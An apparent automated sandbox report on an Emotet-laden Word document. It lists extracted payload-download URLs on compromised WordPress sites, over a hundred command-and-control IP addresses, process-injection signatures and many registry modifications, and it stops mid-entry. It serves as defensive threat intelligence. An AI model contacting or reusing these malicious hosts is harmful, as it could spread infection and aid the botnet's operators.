Analysis
-
max time kernel
127s -
resource
win7v191014 -
submitted
17-12-2019 13:55
Task
task1
Sample
Docs_fbff465d66a0eb834b052719a27f5ab1.15.doc
Resource
win7v191014
General
Malware Config
Extracted
http://nangngucsiam.com/wp-content/plugins/wp-ffpc/4ij33/
http://jsd-id.com/wp-content/uploads/4ae3ep99933/
http://18teens.xyz/wp-content/epewe862/
http://www.fundzit.com/wp-admin/g05/
http://wp.banyannaples.com/cgi-bin/97sq9667/
Extracted
emotet
152.170.108.99:443
99.252.27.6:80
93.148.252.90:80
96.126.121.64:443
104.236.137.72:8080
85.234.143.94:8080
80.85.87.122:8080
2.139.158.136:443
80.11.158.65:8080
79.31.85.103:80
77.55.211.77:8080
96.61.113.203:80
181.198.203.45:443
142.93.114.137:8080
186.15.83.52:8080
181.36.42.205:443
68.183.190.199:8080
159.203.204.126:8080
50.28.51.143:8080
46.101.212.195:8080
188.216.24.204:80
118.36.70.245:80
185.160.212.3:80
190.146.131.105:8080
37.120.185.153:443
91.205.215.57:7080
76.221.133.146:80
139.5.237.27:443
83.165.163.225:80
73.60.8.210:80
93.67.154.252:443
96.38.234.10:80
24.100.130.206:80
109.169.86.13:8080
186.68.48.204:443
82.36.103.14:80
139.162.118.88:8080
200.119.11.118:443
223.255.148.134:80
2.44.167.52:80
91.83.93.124:7080
207.154.204.40:8080
51.255.165.160:8080
97.81.12.153:80
69.163.33.84:8080
68.174.15.223:80
190.186.164.23:80
82.196.15.205:8080
63.246.252.234:80
200.123.101.90:80
138.68.106.4:7080
188.14.39.65:443
119.59.124.163:8080
181.231.62.54:80
217.199.160.224:8080
163.172.40.218:7080
149.62.173.247:8080
203.130.0.69:80
212.71.237.140:8080
46.28.111.142:7080
191.103.76.34:443
204.63.252.182:443
85.152.208.146:80
91.74.175.46:80
91.204.163.19:8090
68.129.203.162:443
91.117.83.59:80
149.135.123.65:80
113.61.76.239:80
200.58.83.179:80
118.200.218.193:443
130.45.45.31:80
190.38.14.52:80
87.106.77.40:7080
142.127.57.63:8080
45.79.95.107:443
183.99.239.141:80
5.32.41.106:80
201.213.32.59:80
62.75.160.178:8080
5.196.35.138:7080
172.90.70.168:8080
192.241.146.84:8080
37.183.121.32:80
86.42.166.147:80
184.184.202.167:443
94.200.114.162:80
190.97.30.167:990
219.75.66.103:80
190.210.184.138:995
181.61.143.177:80
181.135.153.203:443
111.125.71.22:8080
45.50.177.164:80
185.86.148.222:8080
125.99.61.162:7080
116.48.148.32:80
71.76.45.83:443
68.183.170.114:8080
14.160.93.230:80
72.29.55.174:80
62.75.143.100:7080
104.131.58.132:8080
190.195.129.227:8090
2.42.173.240:80
79.7.114.1:80
58.171.181.213:80
178.79.163.131:8080
109.166.89.91:80
203.25.159.3:8080
116.48.138.115:80
200.124.225.32:80
74.59.187.94:80
112.218.134.227:80
82.8.232.51:80
5.88.27.67:8080
144.139.56.105:80
104.33.129.244:80
73.167.135.180:80
87.106.46.107:8080
212.237.50.61:8080
Signatures
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 820 Powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 820 wrote to memory of 2104 820 Powershell.exe 33 PID 2104 wrote to memory of 2128 2104 67.exe 34 PID 2180 wrote to memory of 2196 2180 speednetsh.exe 36 -
Modifies registry class 144 IoCs
description ioc Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{1C631C62-9C94-4DA2-B778-7DFE0432D29A}\2.0\FLAGS\ = "6" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{1C631C62-9C94-4DA2-B778-7DFE0432D29A}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C7A3642F-07F5-4A8F-83B0-63E3DDD9F16A}\1.0\ = "Microsoft InkEdit Control 1.0" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C4786244-E0D2-4D26-9F7C-DD2F5654A116}\1.0\FLAGS\ = "4" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1C631C62-9C94-4DA2-B778-7DFE0432D29A}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C4786244-E0D2-4D26-9F7C-DD2F5654A116}\1.0\ = "Microsoft InkEdit Control 1.0" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C4786244-E0D2-4D26-9F7C-DD2F5654A116}\1.0\0\win32\ = "C:\\Users\\Admin\\Application Data\\Microsoft\\Forms\\INKEDLib.exd" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C7A3642F-07F5-4A8F-83B0-63E3DDD9F16A}\1.0\FLAGS\ = "4" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{1C631C62-9C94-4DA2-B778-7DFE0432D29A}\2.0\ = "Microsoft Forms 2.0 Object Library" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1C631C62-9C94-4DA2-B778-7DFE0432D29A}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1C631C62-9C94-4DA2-B778-7DFE0432D29A}\2.0\FLAGS\ = "6" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C7A3642F-07F5-4A8F-83B0-63E3DDD9F16A}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\INKEDLib.exd" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\TypeLib\{1C631C62-9C94-4DA2-B778-7DFE0432D29A}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C4786244-E0D2-4D26-9F7C-DD2F5654A116}\1.0\HELPDIR\ = "C:\\Users\\Admin\\Application Data\\Microsoft\\Forms" Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1C631C62-9C94-4DA2-B778-7DFE0432D29A}\2.0\ = "Microsoft Forms 2.0 Object Library" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" Set value (str) \REGISTRY\USER\S-1-5-21-1774239815-1814403401-2200974991-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" Set value (str) 